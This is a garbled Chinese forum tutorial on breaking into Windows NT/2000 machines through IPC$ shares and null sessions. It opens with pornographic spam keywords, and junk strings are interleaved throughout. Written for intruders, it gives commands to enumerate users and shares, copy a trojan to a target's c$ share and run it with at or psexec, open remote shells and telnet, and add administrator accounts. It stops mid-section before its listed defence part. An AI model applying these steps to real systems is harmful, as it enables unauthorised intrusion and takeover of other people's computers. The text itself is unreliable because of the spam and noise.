国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

一 摘要
二 什么是ipc$
三 什么是空會(huì)話
四 空會(huì)話可以做什么
五 ipc$所使用的端口$ n; o8 B5 Z/ N. _
六 ipc管道在hack攻擊中的意義
七 ipc$連接失敗的常見原因+ q9 }; ]- u/ r7 H6 j3 ~4 e
八 復(fù)制文件失敗的原因
九 關(guān)于at命令和xp對(duì)ipc$的限制
十 如何打開目標(biāo)的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令/ K- Y4 P+ r/ r) p& m& U
十二 入侵中可能會(huì)用到的命令+ ]1 t1 x7 c" C) k
十三 對(duì)比過去和現(xiàn)今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵問答精選
一 摘要9 k4 e! Z, q( A9 c, J& _
注意：本文所討論的各種情況均默認(rèn)發(fā)生在win NT/2000環(huán)境下，win98將不在此次討論之列。, [; i4 F3 v1 _! i. ~! o( g6 j/ `- W
5 _* m3 u8 G) s6 V, ]4 y
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進(jìn)程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換，從而實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問。IPC$是NT/2000的一項(xiàng)新功能，它有一個(gè)特點(diǎn)，即在同一時(shí)間內(nèi)，兩個(gè)IP之間只允許建立一個(gè)連接。NT/2000在提供了ipc$功能的同時(shí)，在初次安裝系統(tǒng)時(shí)還打開了默認(rèn)共享，即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導(dǎo)致了系 統(tǒng)安全性的降低。$ w+ r3 G5 U$ f4 |5 j6 L/ O  k; W2 r
平時(shí)我們總能聽到有人在說ipc$漏洞，ipc$漏洞，其實(shí)ipc$并不是一個(gè)真正意義上的漏洞,我想之所以有人這么說，一定是指微軟自己安置的那個(gè)‘后門’：空會(huì)話（Null session）。那么什么是空會(huì)話呢？* }4 V4 I1 G0 h' ]
& W. J7 c0 l7 _" v5 l& {/ P! l% x. A
三 什么是空會(huì)話
在介紹空會(huì)話之前，我們有必要了解一下一個(gè)安全會(huì)話是如何建立的。
在Windows NT 4.0中是使用挑戰(zhàn)響應(yīng)協(xié)議與遠(yuǎn)程機(jī)器建立一個(gè)會(huì)話的，建立成功的會(huì)話將成為一個(gè)安全隧道，建立雙方通過它互通信息，這個(gè)過程的大致順序如下： 8 w/ x% E' c" y5 C/ K# l7 |3 J
1）會(huì)話請(qǐng)求者（客戶）向會(huì)話接收者（服務(wù)器）傳送一個(gè)數(shù)據(jù)包，請(qǐng)求安全隧道的建
立；
2）服務(wù)器產(chǎn)生一個(gè)隨機(jī)的64位數(shù)（實(shí)現(xiàn)挑戰(zhàn)）傳送回客戶；
3）客戶取得這個(gè)由服務(wù)器產(chǎn)生的64位數(shù)，用試圖建立會(huì)話的賬號(hào)的口令打亂它，將結(jié)
果返回到服務(wù)器（實(shí)現(xiàn)響應(yīng)）； $ b: {/ r1 L% n
4）服務(wù)器接受響應(yīng)后發(fā)送給本地安全驗(yàn)證（LSA），LSA通過使用該用戶正確的口令來核實(shí)響應(yīng)以便確認(rèn)請(qǐng)求者身份。如果請(qǐng)求者的賬號(hào)是服務(wù)器的本地賬號(hào)，核實(shí)本地發(fā)生；如果請(qǐng)求的賬號(hào)是一個(gè)域的賬號(hào)，響應(yīng)傳送到域控制器去核實(shí)。當(dāng)對(duì)挑戰(zhàn)的響應(yīng)核實(shí)為正確 后，一個(gè)訪問令牌產(chǎn)生，然后傳送給客戶。客戶使用這個(gè)訪問令牌連接到服務(wù)器上的資源直到建議的會(huì)話被終止。
以上是一個(gè)安全會(huì)話建立的大致過程，那么空會(huì)話又如何呢？
空會(huì)話是在沒有信任的情況下與服務(wù)器建立的會(huì)話（即未提供用戶名與密碼），但根據(jù)WIN2000的訪問控制模型，空會(huì)話的建立同樣需要提供一個(gè)令牌，可是空會(huì)話在建立過程中并沒有經(jīng)過用戶信息的認(rèn)證，所以這個(gè)令牌中不包含用戶信息，因此，這個(gè)會(huì)話不能讓系 統(tǒng)間發(fā)送加密信息，但這并不表示空會(huì)話的令牌中不包含安全標(biāo)識(shí)符SID（它標(biāo)識(shí)了用戶和所屬組），對(duì)于一個(gè)空會(huì)話，LSA提供的令牌的SID是S-1-5-7，這就是空會(huì)話的SID，用戶名是：ANONYMOUS LOGON（這個(gè)用戶名是可以在用戶列表中看到的，但是是不能在SAM數(shù)據(jù)庫中找到，屬于系統(tǒng)內(nèi)置的賬號(hào)），這個(gè)訪問令牌包含下面?zhèn)窝b的組：
Everyone
Network5 R8 t% }9 i% r1 o+ }
在安全策略的限制下，這個(gè)空會(huì)話將被授權(quán)訪問到上面兩個(gè)組有權(quán)訪問到的一切信息。那么建立空會(huì)話到底可以作什么呢？
! A: N; B# i( }
四 空會(huì)話可以做什么
對(duì)于NT，在默認(rèn)安全設(shè)置下，借助空連接可以列舉目標(biāo)主機(jī)上的用戶和共享，訪問everyone權(quán)限的共享，訪問小部分注冊(cè)表等，并沒有什么太大的利用價(jià)值；對(duì)2000作用更小，因?yàn)樵赪indows 2000 和以后版本中默認(rèn)只有管理員和備份#作員有權(quán)從網(wǎng)絡(luò)訪問到注冊(cè)表，而且實(shí)現(xiàn)起來也不方便，需借助工具。7 M. s, r6 c+ ^9 A, n6 k. v) Y
從這些我們可以看到，這種非信任會(huì)話并沒有多大的用處，但從一次完整的ipc$入侵來看，空會(huì)話是一個(gè)不可缺少的跳板，因?yàn)槲覀儚乃抢锟梢缘玫綉袅斜?，而大多?shù)弱口令掃描工具就是利用這個(gè)用戶列表來進(jìn)行口令猜解的，成功的導(dǎo)出用戶列表大大增加了猜解的成 功率，僅從這一點(diǎn)，足以說明空會(huì)話所帶來的安全隱患，因此說空會(huì)話毫無用處的說法是不正確的。以下是空會(huì)話中能夠使用的一些具體命令：. I. i, D" S3 o' {

1 首先，我們先建立一個(gè)空連接（當(dāng)然，這需要目標(biāo)開放ipc$）/ ]0 z$ T* a' ?( ~+ U0 m
命令：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "" /user:""  X7 s* }- M- m' ~4 m( ~
注意：上面的命令包括四個(gè)空格，net與use中間有一個(gè)空格，use后面一個(gè)，密碼左右各一個(gè)空格。# e/ n) A: J1 ?/ y  I0 {

2 查看遠(yuǎn)程主機(jī)的共享資源
命令：net view [url=file://\\ip]\\ip[/url]5 f8 ~& D1 t9 F+ }; d9 O. T3 B
解釋：前提是建立了空連接后，用此命令可以查看遠(yuǎn)程主機(jī)的共享資源，如果它開了共享，可以得到如下面的結(jié)果，但此命令不能顯示默認(rèn)共享。0 d; F0 d! _7 [) h+ W2 C" z) m# f
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋; X5 p, X2 B: e
-----------------------------------------------------------0 D( q8 ^+ D; R  }5 ~! N: d
NETLOGON Disk Logon server share3 g# |" j9 |; s1 j0 b' e: N
SYSVOL Disk Logon server share/ V8 X! ]: ^( s% g
命令成功完成。
3 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間
命令： net time [url=file://\\ip]\\ip[/url]. B* G2 Q3 Y1 E4 Q! K2 t
解釋：用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間。3 M) a: f( ~# V: f- o% l
( o2 \' m3 E0 H" |) b: m" r8 l, w
4 得到遠(yuǎn)程主機(jī)的NetBIOS用戶名列表（需要打開自己的NBT）, D7 `2 Q$ V0 c, T0 |9 r8 ~
命令：nbtstat -A ip* ^$ Z. l- y8 i3 i2 V. W
用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的NetBIOS用戶名列表，返回如下結(jié)果：4 V) s1 I2 P% m
Node IpAddress: [*.*.*.*] Scope Id: [], j, T& m5 I" q+ N: I! S& F
NetBIOS Remote Machine Name Table# U' J( r& N! I  S+ q& |) d* I
Name Type Status& B  Y5 `/ h9 m" B" a6 `: T
---------------------------------------------
SERVER UNIQUE Registered
OYAMANISHI-H GROUP Registered
OYAMANISHI-H GROUP Registered! x3 _# P4 _( ~
SERVER UNIQUE Registered( h. V' a8 v, i+ {$ q
OYAMANISHI-H UNIQUE Registered( h# A, S4 ?9 q. P. p: `9 Q' }+ N" d
OYAMANISHI-H GROUP Registered9 z: m3 X# ~0 t+ d' g, V' m+ Q5 Y
SERVER UNIQUE Registered# r, ]9 C+ D5 b. b/ s0 c- ?
OYAMANISHI-H UNIQUE Registered
..__M##ROWSE__. GROUP Registered
INet~Services GROUP Registered; p2 P, A  |: u
IS~SERVER...... UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37

以上就是我們經(jīng)常使用空會(huì)話做的事情，好像也能獲得不少東西喲，不過要注意一點(diǎn)：建立IPC$連接的#作會(huì)在Event Log中留下記錄，不管你是否登錄成功。 好了，那么下面我們就來看看ipc$所使用的端口是什么？. A- {$ R& n# R  L$ v

五 ipc$所使用的端口
首先我們來了解一些基礎(chǔ)知識(shí)：4 Q, L* ^) H6 E/ H- ?% u2 F
1 SMB: (Server Message Block) Windows協(xié)議族，用于文件打印共享的服務(wù)；- b; w! v) ^2 f6 J( B- d
2 NBT: (NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口實(shí)現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。
3 在WindowsNT中SMB基于NBT實(shí)現(xiàn)，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT實(shí)現(xiàn)，還可以直接通過445端口實(shí)現(xiàn)。) e1 g, I) N( k0 C# H! q1 o
有了這些基礎(chǔ)知識(shí)，我們就可以進(jìn)一步來討論訪問網(wǎng)絡(luò)共享對(duì)端口的選擇了：5 c7 R- I, v$ a0 L3 I/ u5 R# k
對(duì)于win2000客戶端（發(fā)起端）來說：- g: v. ?$ Y8 e6 z
1 如果在允許NBT的情況下連接服務(wù)器時(shí)，客戶端會(huì)同時(shí)嘗試訪問139和445端口，如果445端口有響應(yīng)，那么就發(fā)送RST包給139端口斷開連接，用455端口進(jìn)行會(huì)話，當(dāng)445端口無響應(yīng)時(shí)，才使用139端口，如果兩個(gè)端口都沒有響應(yīng)，則會(huì)話失?。?span style="FONT-SIZE: 0px;COLOR: #fff">+ W# O& g6 _6 j. F2 j
2 如果在禁止NBT的情況下連接服務(wù)器時(shí)，那么客戶端只會(huì)嘗試訪問445端口，如果445端口無響應(yīng)，那么會(huì)話失敗。/ x: L. }3 r& c7 D2 [( F- t
3 `  F  }& b$ n/ I" e: x* f
對(duì)于win2000服務(wù)器端來說：
1 如果允許NBT, 那么UDP端口137, 138, TCP 端口 139, 445將開放（LISTENING）；- G. M& ?+ Q& B% Y7 D7 B
2 如果禁止NBT，那么只有445端口開放。
* ]7 x& @$ i& @& _# j
我們建立的ipc$會(huì)話對(duì)端口的選擇同樣遵守以上原則。顯而易見，如果遠(yuǎn)程服務(wù)器沒有監(jiān)聽139或445端口，ipc$會(huì)話是無法建立的。

六 ipc管道在hack攻擊中的意義
ipc管道本來是微軟為了方便管理員進(jìn)行遠(yuǎn)程管理而設(shè)計(jì)的，但在入侵者看來，開放ipc管道的主機(jī)似乎更容易得手。通過ipc管道，我們可以遠(yuǎn)程調(diào)用一些系統(tǒng)函數(shù)（大多通過工具實(shí)現(xiàn)，但需要相應(yīng)的權(quán)限），這往往是入侵成敗的關(guān)鍵。如果不考慮這些，僅從傳送 文件這一方面，ipc管道已經(jīng)給了入侵者莫大的支持，甚至已經(jīng)成為了最重要的傳輸手段，因此你總能在各大論壇上看到一些朋友因?yàn)榇虿婚_目標(biāo)機(jī)器的ipc管道而一籌莫展大呼救命。當(dāng)然，我們也不能忽視權(quán)限在ipc管道中扮演的重要角色，想必你一定品嘗過空會(huì) 話的尷尬，沒有權(quán)限，開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權(quán)限，那么ipc管道這把雙刃劍將顯示出它猙獰的一面。. m) n7 g5 N4 V% {& q
7 O& x+ l$ t# O1 d
七 ipc$連接失敗的常見原因
以下是一些常見的導(dǎo)致ipc$連接失敗的原因：
1 IPC連接是Windows NT及以上系統(tǒng)中特有的功能，由于其需要用到Windows NT中很多DLL函數(shù)，所以不能在Windows 9.x/Me系統(tǒng)中運(yùn)行，也就是說只有nt/2000/xp才可以相互建立ipc$連接，98/me是不能建立ipc$連接的；5 i. P3 s& `5 |/ A

2 如果想成功的建立一個(gè)ipc$連接，就需要響應(yīng)方開啟ipc$共享，即使是空連接也是這樣，如果響應(yīng)方關(guān)閉了ipc$共享，將不能建立連接；

3 連接發(fā)起方未啟動(dòng)Lanmanworkstation服務(wù)（顯示名為：Workstation）：它提供網(wǎng)絡(luò)鏈結(jié)和通訊，沒有它發(fā)起方無法發(fā)起連接請(qǐng)求；

4 響應(yīng)方未啟動(dòng)Lanmanserver服務(wù)（顯示名為：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依賴于此服務(wù)，沒有它主機(jī)將無法響應(yīng)發(fā)起方的連接請(qǐng)求，不過沒有它仍可發(fā)起ipc$連接；  L1 [7 f: g3 I% t9 r. `  r" W4 r
3 _) W" g! n4 U
5 響應(yīng)方未啟動(dòng)NetLogon，它支持網(wǎng)絡(luò)上計(jì)算機(jī) pass-through 帳戶登錄身份（不過這種情況好像不多）；+ v& Z0 K5 Y+ Q

6 響應(yīng)方的139，445端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽；. G& W6 E! ]3 l; C, k" a; X# r1 g
2 i) F) O  S2 D# A& i) r
7 連接發(fā)起方未打開139，445端口；

8 用戶名或者密碼錯(cuò)誤：如果發(fā)生這樣的錯(cuò)誤，系統(tǒng)將給你類似于''無法更新密碼''這樣的錯(cuò)誤提示（顯然空會(huì)話排除這種錯(cuò)誤）；
" Y, X8 ?5 N' E4 r. f  H( W
9 命令輸入錯(cuò)誤：可能多了或少了空格，當(dāng)用戶名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略，如果密碼為空，可以直接輸入兩個(gè)引號(hào)""即可；& C& \, l& q" ^* W
, r2 B0 u& a- w. J+ n8 x
10 如果在已經(jīng)建立好連接的情況下對(duì)方重啟計(jì)算機(jī)，那么ipc$連接將會(huì)自動(dòng)斷開，需要重新建立連接。 * t+ n! w( W# l: @
' @. r4 z; p# r: M
另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因： " y' Q2 I( R) g( T
錯(cuò)誤號(hào)5，拒絕訪問：很可能你使用的用戶不是管理員權(quán)限的；
錯(cuò)誤號(hào)51，Windows無法找到網(wǎng)絡(luò)路徑：網(wǎng)絡(luò)有問題；
錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑：ip地址錯(cuò)誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過濾）；
錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名：你的lanmanworkstation服務(wù)未啟動(dòng)或者目標(biāo)刪除了ipc$；
錯(cuò)誤號(hào)1219，提供的憑據(jù)與已存在的憑據(jù)集沖突：你已經(jīng)和對(duì)方建立了一個(gè)ipc$，請(qǐng)刪除再連；   ?) [6 b/ I" e1 R0 C
錯(cuò)誤號(hào)1326，未知的用戶名或錯(cuò)誤密碼：原因很明顯了； - d+ G- ~2 Y% T' g8 W6 r
錯(cuò)誤號(hào)1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng)：目標(biāo)NetLogon服務(wù)未啟動(dòng)；
錯(cuò)誤號(hào)2242，此用戶的密碼已經(jīng)過期：目標(biāo)有賬號(hào)策略，強(qiáng)制定期要求更改密碼。
- `! n0 ^7 C0 s+ r" d; X" |
八 復(fù)制文件失敗的原因
有些朋友雖然成功的建立了ipc$連接，但在copy時(shí)卻遇到了這樣那樣的麻煩，無法復(fù)制成功，那么導(dǎo)致復(fù)制失敗的常見原因又有哪些呢？3 X6 I  C& K. G  m8 s; N, J6 R! i* z

1 對(duì)方未開啟共享文件夾
這類錯(cuò)誤出現(xiàn)的最多，占到50%以上。許多朋友在ipc$連接建立成功后，甚至都不知道對(duì)方是否有共享文件夾，就進(jìn)行盲目復(fù)制，結(jié)果導(dǎo)致復(fù)制失敗而且郁悶的很。因此我建議大家在進(jìn)行復(fù)制之前務(wù)必用net view [url=file://\\IP]\\IP[/url]這個(gè)命令看一下你想要復(fù)制的共享文件夾是否存在（用軟件查看當(dāng)然更好），不要認(rèn)為能建立ipc$連接就一定有共享文件夾存在。( U: t% m- Y1 Y

2 向默認(rèn)共享復(fù)制失敗
這類錯(cuò)誤也是大家經(jīng)常犯的，主要有兩個(gè)小方面：
1）錯(cuò)誤的認(rèn)為能建立ipc$連接的主機(jī)就一定開啟了默認(rèn)共享，因而在建立完連接之后馬上向c$,d$,admin$之類的默認(rèn)共享復(fù)制文件，一旦對(duì)方未開啟默認(rèn)共享，將導(dǎo)致復(fù)制失敗。ipc$連接成功只能說明對(duì)方打開了ipc$共享，并不能說明默認(rèn)共享 一定存在。ipc$共享與默認(rèn)共享是兩碼事，ipc$共享是一個(gè)命名管道，并不是哪個(gè)實(shí)際的文件夾，而默認(rèn)共享卻是實(shí)實(shí)在在的共享文件夾；
2）由于net view [url=file://\\IP]\\IP[/url] 這個(gè)命令無法顯示默認(rèn)共享文件夾（因?yàn)槟J(rèn)共享帶$），因此通過這個(gè)命令，我們并不能判斷對(duì)方是否開啟了默認(rèn)共享，因此如果對(duì)方未開啟默認(rèn)共享，那么所有向默認(rèn)共享進(jìn)行的#作都不能成功；（不過大部分掃描軟件在掃弱口令的同時(shí)，都能掃到默認(rèn)共享目錄，可以 避免此類錯(cuò)誤的發(fā)生）! P, Q$ [+ W. s+ e4 C5 H
要點(diǎn)：請(qǐng)大家一定區(qū)分ipc共享，默認(rèn)共享，普通共享這三者的區(qū)別：ipc共享是一個(gè)管道，并不是實(shí)際的共享文件夾；默認(rèn)共享是安裝時(shí)默認(rèn)打開的文件夾；普通共享是我們自己開啟的可以設(shè)置權(quán)限的共享文件夾。
& `  ?$ s; l" x
3用戶權(quán)限不夠，包括四種情形：
1）空連接向所有共享（默認(rèn)共享和普通共享）復(fù)制時(shí)，權(quán)限是不夠的；4 ~6 v& W! B. P+ S. v
2）向默認(rèn)共享復(fù)制時(shí)，在Win2000 Pro版中，只有Administrators和Backup Operators組成員才可以，在Win2000 Server版本 Server Operatros組也可以訪問到這些共享目錄； 6 F1 H+ I/ t/ e) E
3）向普通共享復(fù)制時(shí)，要具有相應(yīng)權(quán)限（即對(duì)方管理員事先設(shè)定的訪問權(quán)限）；
4）對(duì)方可以通過防火墻或安全軟件的設(shè)置，禁止外部訪問共享；
注意：* o( E' O% X. Z- G9 }. E
1 不要認(rèn)為administrator就一定具有管理員權(quán)限，管理員名稱是可以改的0 }$ j. x* O$ s! R
2 管理員可以訪問默認(rèn)共享的文件夾，但不一定能夠訪問普通的共享文件夾，因?yàn)楣芾韱T可以對(duì)普通的共享文件夾進(jìn)行訪問權(quán)限設(shè)置，如圖6，管理員為D盤設(shè)置的訪問權(quán)限為僅允許名為xinxin的用戶對(duì)該文件夾進(jìn)行完全訪問，那么此時(shí)即使你擁有管理員權(quán)限，你仍然 不能訪問D盤。不過有意思的是，如果此時(shí)對(duì)方又開啟了D$的默認(rèn)共享，那么你卻可以訪問D$，從而繞過了權(quán)限限制，有興趣的朋友可以自己做測(cè)試。6 S& D4 S( Y7 J- G0 `% D0 Q2 O

4被防火墻殺死或在局域網(wǎng)
還有一種情況，那就是也許你的復(fù)制#作已經(jīng)成功，但當(dāng)遠(yuǎn)程運(yùn)行時(shí)，被防火墻殺掉了，導(dǎo)致找不到文件；或者你把木馬復(fù)制到了局域網(wǎng)內(nèi)的主機(jī)，導(dǎo)致連接失?。ǚ聪蜻B接的木馬不會(huì)發(fā)生這種情況）。如果你沒有想到這種情況，你會(huì)以為是復(fù)制上出了問題，但實(shí)際你的復(fù) 制#作已經(jīng)成功了，只是運(yùn)行時(shí)出了問題。" r5 D3 u$ S- C% f2 q* n
6 p6 s& q7 h6 \+ k& ?3 d
呵呵，大家也知道，ipc$連接在實(shí)際#作過程中會(huì)出現(xiàn)各種各樣的問題，上面我所總結(jié)的只是一些常見錯(cuò)誤，沒說到的，大家可以給我提個(gè)醒兒。

九 關(guān)于at命令和xp對(duì)ipc$的限制
本來還想說一下用at遠(yuǎn)程運(yùn)行程序失敗的原因，但考慮到at的成功率不是很高，問題也很多，在這里就不提它了（提的越多，用的人就越多），而是推薦大家用p***ec.exe遠(yuǎn)程運(yùn)行程序，假設(shè)想要遠(yuǎn)程機(jī)器執(zhí)行本地c:\xinxin.exe文件，且管理 員為administrator，密碼為1234，那么輸入下面的命令：2 p# m7 W" c. A8 k, L
p***ec [url=file://\\ip]\\ip[/url] -u administrator -p 1234 -c c:\xinxin.exe; ^& Q+ T5 |& K" b( U2 ~# W
如果已經(jīng)建立ipc連接，則-u -p這兩個(gè)參數(shù)不需要，p***ec.exe將自動(dòng)拷貝文件到遠(yuǎn)程機(jī)器并運(yùn)行。
本來xp中的ipc$也不想在這里討論，想單獨(dú)拿出來討論，但看到越來越多的朋友很急切的提問為什么遇到xp的時(shí)候，大部分#作都很難成功。我在這里就簡(jiǎn)單提一下吧，在xp的默認(rèn)安全選項(xiàng)中，任何遠(yuǎn)程訪問僅被賦予來賓權(quán)限，也就是說即使你是用管理員帳戶和 密碼，你所得到的權(quán)限也只是Guest，因此大部分#作都會(huì)因?yàn)闄?quán)限不夠而失敗，而且到目前為止并沒有一個(gè)好的辦法來突破這一限制。所以如果你真的得到了xp的管理員密碼，我建議你盡量避開ipc管道。
2 o! l4 Z6 z  [  o$ p
十 如何打開目標(biāo)的IPC$共享以及其他共享, W" m" `$ V. Y4 Z! C! }4 b
目標(biāo)的ipc$不是輕易就能打開的，否則就要天下打亂了。你需要一個(gè)admin權(quán)限的shell，比如telnet，木馬，cmd重定向等，然后在shell下執(zhí)行：! E3 f, T$ {' S* F, K
net share ipc$  _: X* l# b- h
開放目標(biāo)的ipc$共享；
net share ipc$ /del; _* Q* y1 U# p; d, p( [7 g
關(guān)閉目標(biāo)的ipc$共享；如果你要給它開共享文件夾，你可以用：8 I+ u! g. G- N. g4 B
net share xinxin=c:\
這樣就把它的c盤開為共享名為xinxin共享文件夾了。（可是我發(fā)現(xiàn)很多人錯(cuò)誤的認(rèn)為開共享文件夾的命令是net share c$，還大模大樣的給菜鳥指指點(diǎn)點(diǎn)，真是誤人子弟了）。再次聲明，這些#作都是在shell下才能實(shí)現(xiàn)的。
十一 一些需要shell才能完成的命令
看到很多教程這方面寫的十分不準(zhǔn)確，一些需要shell才能完成命令就簡(jiǎn)簡(jiǎn)單單的在ipc$連接下執(zhí)行了，起了誤導(dǎo)作用。那么下面我總結(jié)一下需要在shell才能完成的命令：
1 向遠(yuǎn)程主機(jī)建立用戶，激活用戶，修改用戶密碼，加入管理組的#作需要在shell下完成；* k$ W, S3 C1 |  M2 e7 P5 S1 g1 i% \
2 打開遠(yuǎn)程主機(jī)的ipc$共享，默認(rèn)共享，普通共享的#作需要在shell下完成；* ~6 D2 Z& I4 ?' ]& `+ ]( N
3 運(yùn)行/關(guān)閉遠(yuǎn)程主機(jī)的服務(wù)，需要在shell下完成；4 Z7 e/ t1 M4 D5 N
4 啟動(dòng)/殺掉遠(yuǎn)程主機(jī)的進(jìn)程，也需要在shell下完成（用軟件的情況下除外，如pskill）。* ]2 I# }+ v+ w( u1 m( c% H. s4 t
) ?- m: w- y1 ]8 e
十二 入侵中可能會(huì)用到的命令" o8 k8 W3 V7 k$ d, E/ O
為了這份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已經(jīng)掌握了這些命令，你可以跳過這一部分看下面的內(nèi)容。請(qǐng)注意這些命令是適用于本地還是遠(yuǎn)程，如果只適用于本地，你只能在獲得遠(yuǎn)程主機(jī)的shell（如cmd，telnet等）后，才能 向遠(yuǎn)程主機(jī)執(zhí)行。3 l. _( `; d+ w
$ a* }3 b: ^* \, B. y* Z, A3 {
1 建立/刪除ipc$連接的命令
1）建立空連接:( m) ]4 z) `7 q  j& g. V8 ^9 T
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] "" /user:"" 1 b* L" v8 `! ~& j8 B2 e
2）建立非空連接:
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] "密碼" /user:"用戶名" / O4 a) A) n4 p/ `) v
3）刪除連接:, X! }3 c- X- x$ c# {0 l% n
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] /del
7 y9 V! K1 o/ m* [$ N* R& @
2 在ipc$連接中對(duì)遠(yuǎn)程主機(jī)的#作命令
1） 查看遠(yuǎn)程主機(jī)的共享資源（看不到默認(rèn)共享）:% h; M, j8 R4 W  A: M
net view [url=file://\\127.0.0.1]\\127.0.0.1[/url]
2） 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間:9 H' v5 t! u/ q) @* k# i9 Y
net time [url=file://\\127.0.0.1]\\127.0.0.1[/url] ; a( t0 ~  }- _$ B9 D( k( p7 f. z
3） 得到遠(yuǎn)程主機(jī)的netbios用戶名列表:& b7 `: I# I9 X
nbtstat -A 127.0.0.1 3 I6 X5 ]' R" |( M
4）映射/刪除遠(yuǎn)程共享:
net use z: [url=file://\\127.0.0.1\c]\\127.0.0.1\c[/url]
此命令將共享名為c的共享資源映射為本地z盤
net use z: /del
刪除映射的z盤，其他盤類推
5）向遠(yuǎn)程主機(jī)復(fù)制文件:
copy 路徑\文件名 [url=file://\\IP\]\\IP\[/url]共享目錄名，如：
copy c:\xinxin.exe [url=file://\\127.0.0.1\c$]\\127.0.0.1\c$[/url] 即將c盤下的xinxin.exe復(fù)制到對(duì)方c盤內(nèi)7 M! c0 j" y+ ]* ~+ j" f
當(dāng)然，你也可以把遠(yuǎn)程主機(jī)上的文件復(fù)制到自己的機(jī)器里：* Z. }3 N; Y& J  z9 n9 ^
copy [url=file://\\127.0.0.1\c$\xinxin.exe]\\127.0.0.1\c$\xinxin.exe[/url] c:\9 q! y& b: x( \6 b: I
6）遠(yuǎn)程添加計(jì)劃任務(wù):
at [url=file://\\IP]\\IP[/url] 時(shí)間 程序名 如：
at [url=file://\\127.0.0.0]\\127.0.0.0[/url] 11:00 xinxin.exe
注意：時(shí)間盡量使用24小時(shí)制；如果你打算運(yùn)行的程序在系統(tǒng)默認(rèn)搜索路徑（比如system32/）下則不用加路徑，否則必須加全路徑
: \  S( B# F# ~8 Z' _
3 本地命令
1）查看本地主機(jī)的共享資源（可以看到本地的默認(rèn)共享）9 H9 X8 B+ j. J
net share; @& ?8 ]* P. C4 I4 S$ R% u
2）得到本地主機(jī)的用戶列表3 I8 n& k. C5 {, ~% J
net user
3）顯示本地某用戶的帳戶信息
net user 帳戶名
4）顯示本地主機(jī)當(dāng)前啟動(dòng)的服務(wù)  R8 Q0 x( }2 U+ V5 }1 w
net start % Z$ O$ G5 b% t
5）啟動(dòng)/關(guān)閉本地服務(wù)
net start 服務(wù)名 , V1 e4 I0 M- x. V% z6 v* s
net stop 服務(wù)名 9 k! J0 m1 E/ |4 g: m# I8 {$ z
6）在本地添加帳戶
net user 帳戶名 密碼 /add1 T5 g& X9 M* E$ e
7）激活禁用的用戶
net uesr 帳戶名 /active:yes
8）加入管理員組, u7 c- F" g+ c
net localgroup administrators 帳戶名 /add ' r! I, P3 S2 O/ _$ H! u) w& n
很顯然的是，雖然這些都是本地命令，但如果你在遠(yuǎn)程主機(jī)的shell中輸入，比如你telnet成功后輸入上面這些命令，那么這些本地輸入將作用在遠(yuǎn)程主機(jī)上。8 {; {# N% P1 ?1 T# Y
) ]. @7 C: o. |8 d" [; e; D
4 其他一些命令2 k$ G1 y0 I: S' f" L: p
1）telnet % u6 x3 }) i9 E: Q. j1 `
telnet IP 端口& q, Q& J- ]' ]! x
telnet 127.0.0.0 23) `9 C- q5 {8 X& Q# ~5 V  k: @, I
2）用opentelnet.exe開啟遠(yuǎn)程主機(jī)的telnet) G4 E8 O, @' i& k8 u; y
OpenTelnet.exe [url=file://\\ip]\\ip[/url] 管理員賬號(hào) 密碼 NTLM的認(rèn)證方式 port
OpenTelnet.exe [url=file://\\127.0.0.1]\\127.0.0.1[/url] administrator "" 1 905 b9 Z* f9 h: |- l
不過這個(gè)小工具需要滿足四個(gè)要求：
1）目標(biāo)開啟了ipc$共享; D# \! D# }2 E( I/ \
2）你要擁有管理員密碼和賬號(hào)' e6 d5 {3 t, e( M& j7 d7 ^0 b
3）目標(biāo)開啟RemoteRegistry服務(wù)，用戶就可以更改ntlm認(rèn)證
4）對(duì)僅WIN2K/XP有效
3）用p***ec.exe一步獲得shell，需要ipc管道支持  p% y6 j. z  z2 q4 Q. \
p***ec.exe [url=file://\\IP]\\IP[/url] -u 管理員賬號(hào) -p 密碼 cmd2 r2 I" w  @- Z. E
p***ec.exe [url=file://\\127.0.0.1]\\127.0.0.1[/url] -u administrator -p "" cmd7 |" x; \! }: Q9 Q! }4 t/ {' E
: p* Y) F0 K1 Z" ~. @5 n4 _: n$ a
十三 對(duì)比過去和現(xiàn)今的ipc$入侵: x2 ?& ~! F2 ^  Q( a/ T; m8 Z
既然是對(duì)比，那么我就先把過去的ipc$入侵步驟寫給大家，都是蠻經(jīng)典的步驟：  U- j( A; m; E4 W& p2 u: \
[1]
